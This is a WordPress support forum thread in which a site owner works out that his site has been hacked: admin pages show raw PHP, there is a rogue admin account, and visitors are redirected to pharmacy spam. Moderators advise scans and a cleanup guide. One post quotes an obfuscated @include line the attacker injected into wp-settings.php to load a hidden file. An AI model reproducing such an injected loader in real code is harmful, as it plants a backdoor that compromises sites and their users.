Can gain Admin access to Dashboard but no control beyond here.

  • The website itself looks OK and I can log in as administrator to gain access to the Dashboard. However if I try to use any of the links from there the admin pages don’t load or render correctly and display as PHP code (I suspect). I am on a Virtual Host but AFAIK there have been no changes.

    Below is an short example of what is displayed instead of the administrative pages:

    ‘ . __( ‘You need a higher level of permission.’ ) . ” . ‘
    ‘ . __( ‘Sorry, you are not allowed to list users.’ ) . ‘

    ‘, 403 ); } $wp_list_table = _get_list_table(‘WP_Users_List_Table’); $pagenum = $wp_list_table->get_pagenum(); $title = __(‘Users’); $parent_file = ‘users.php’; add_screen_option( ‘per_page’ ); // contextual help – choose Help on the top right of admin panel to preview this. get_current_screen()->add_help_tab( array( ‘id’ => ‘overview’, ‘title’ => __(‘Overview’), ‘content’ => ‘
    ‘ . __(‘This screen lists all the existing users for your site. Each user has one of five defined roles as set by the site admin: Site Administrator, Editor, Author, Contributor, or Subscriber. Users with roles other than Administrator will see fewer options in the dashboard navigation when they are logged in, based on their role.’) . ‘

    ‘ . ‘
    ‘ . __(‘To add a new user for your site, click the Add New button at the top of the screen or Add New in the Users menu section.’) . ‘

    ‘ ) ) ; get_current_screen()->add_help_tab( array( ‘id’ => ‘screen-content’, ‘title’ => __(‘Screen Content’), ‘content’ => ‘
    ‘ . __(‘You can customize the display of this screen in a number of ways:’) . ‘

    ‘ . ‘

    The page I need help with: [log in to see the link]

Viewing 11 replies - 1 through 11 (of 11 total)
  • Moderator t-p

    (@t-p)

    Are you the admin with administrative role?

    https://codex.www.ads-software.com/Roles_and_Capabilities

    Thread Starter martynthompson

    (@martynthompson)

    Hi t-p,
    Thanks for the reply. Yes I am. I have three of my own user names with different privileges – including one with complete Admin privileges.
    I have looked at the database directly and found a user registered with the friendly name of “Service” and also a login name similar to wp.serviceuser.ql07 (this isn’t exact) but it is certainly not a name I know as being registered. We are a small group of only about 110 users so I recognise all of the names. I suspect this is a rogue user and have deleted their account.
    Thanks for any advice.

    Martyn

    Moderator t-p

    (@t-p)

    This may be a plugin or theme conflict. Please attempt to disable all plugins, and use one of the default (Twenty*) themes. If the problem goes away, enable them one by one to identify the source of your troubles.

    If you can install plugins, install “Health Check”: https://www.ads-software.com/plugins/health-check/ On the troubleshooting tab, you can click the button to disable all plugins and change the theme for you, while you’re still logged in, without affecting normal visitors to your site.

    Thread Starter martynthompson

    (@martynthompson)

    Hi t-p,

    I have disabled the plugins by SSH into the server and renaming the plugins directory to plugins_t and the same with the oceanwp theme (and it’s created child). The only themes left are twentyfifteen, twentysixteen and twentyseventeen.
    As I cannot get access to the themes page through WP I am unable to formally activate or change the theme.

    I have attempted to refresh the page and access any of the Admin pages and still cannot. Although I have Admin privileges is it possible this rogue account [ Moderated: User login and User_nicename redacted, please do not post such info. ] has altered my own Admin privileges without me accepting them as a user? Is there a way I can check this by looking at the database directly – which I have access to?

    Best regards,

    Martyn.

    • This reply was modified 6 years, 3 months ago by t-p.
    Thread Starter martynthompson

    (@martynthompson)

    I have found an odd file in my root directory (httpdocs) named 3f5efmc9ch.php which has execute permissions and appears to be a part of some PHP code.

    I can print it here but don’t want to give anyone else any ideas if it is going to risk breaking their installation.

    There was also this near the first line of wp-settings.php in the root.
    @include “\057var/\167ww/v\150osts\057ansu\153.org\057http\144ocs/\155oodl\145/gra\144e/ed\151t/.0\065666e\0604.ic\157”;

    Does it look like I have been hacked?

    BW,

    Martyn

    Yes maybe

    Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    Rajan V

    Moderator t-p

    (@t-p)

    Scan your site with wordfence plugin https://www.ads-software.com/plugins/wordfence/

    Thread Starter martynthompson

    (@martynthompson)

    Dear Rajan V and t-p,

    Thanks for your comments and suggestions. I shall work through these.

    Regards,

    Martyn.

    Thread Starter martynthompson

    (@martynthompson)

    Dear Rajan V and t-p,

    Want to thank you for the support so far. I have discovered that in addition to not being able to access the admin side of things, when visiting the site through google or bing browsers were being redirected to a pharmacological page.

    I think this is more than a coincidence and used Plesk to do some command line sleuthing and it warned me about some directories with elevated chmod privileges that were not required (specifically 0777 images directory). On deleting the subfolder with binary files in using the command line I regained some limited control but when ls-ing again the directory has been recreated with some binaries back in there.

    I feel this is a step forward but just need to find out what is causing this directory and binaries to be recreated.

    Thanks for any advice.

    Martyn

    Moderator t-p

    (@t-p)

    when visiting the site through google or bing browsers were being redirected to a pharmacological page

    Sorry to inform you looks like your site has been hacked.

    See https://sitecheck.sucuri.net/results/www.ansuk.org

    Carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Off hand, couple of names that come to mind are Sucuri and Wordfence.

    Thread Starter martynthompson

    (@martynthompson)

    Hi t-p,

    Thanks for advice and confirmation. I have a professional looking at it right now. I am working through the guide you posted too.

    Appreciate your advice and help.

    Regards,

    Martyn.

Viewing 11 replies - 1 through 11 (of 11 total)
  • The topic ‘Can gain Admin access to Dashboard but no control beyond here.’ is closed to new replies.